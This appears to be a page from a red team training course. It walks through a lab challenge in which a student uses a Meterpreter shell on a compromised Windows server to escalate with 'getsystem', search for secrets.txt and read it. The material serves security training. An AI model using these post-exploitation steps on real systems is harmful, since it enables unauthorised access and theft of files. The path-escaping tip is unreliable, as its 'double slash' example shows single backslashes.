Skip to content

Challenge 8: Finding Sensitive Files

Procedure:

With access gained on the final target server, the last step is to grab the flag and claim victory.

  • Using your Meterpreter shell, search the target server for a file named secrets.txt .

  • Read the contents of the file, and include them in your report.

    Note: If you have found the filepath but get errors trying to open the file, it is likely a syntax issue. Using Windows-style filepaths in a Linux command line can be difficult, since Windows uses backslashes instead of forward slashes in paths, which your command line will interpret as an escape sequence instead of a literal backslash. There are two good workarounds for this:

    • Put quotes around the filepath in your command, like "C:\Windows\system32\file.txt"
    • Alternatively, you can use double slashes in place of the forward slashes: C:\Windows\system32\file.txt

Solution:

Finding the file secrets.txt.

1
2
3
4
5
6
7
8
9
meterpreter > getsystem
[-] Already running as SYSTEM
meterpreter > search -f secrets.txt
Found 1 result...
=================

Path                          Size (bytes)  Modified (UTC)
----                          ------------  --------------
c:\Windows\debug\secrets.txt  55            2022-11-05 22:01:13 +0000

Reading the file secrets.txt.

1
2
meterpreter > cat c:\\Windows\\debug\\secrets.txt
Congratulations! You have finished the red team course!meterpreter >

alt text

Congratulations! You have finished the red team course!

Previous: Challenge 6 Home 🏠 Next: Report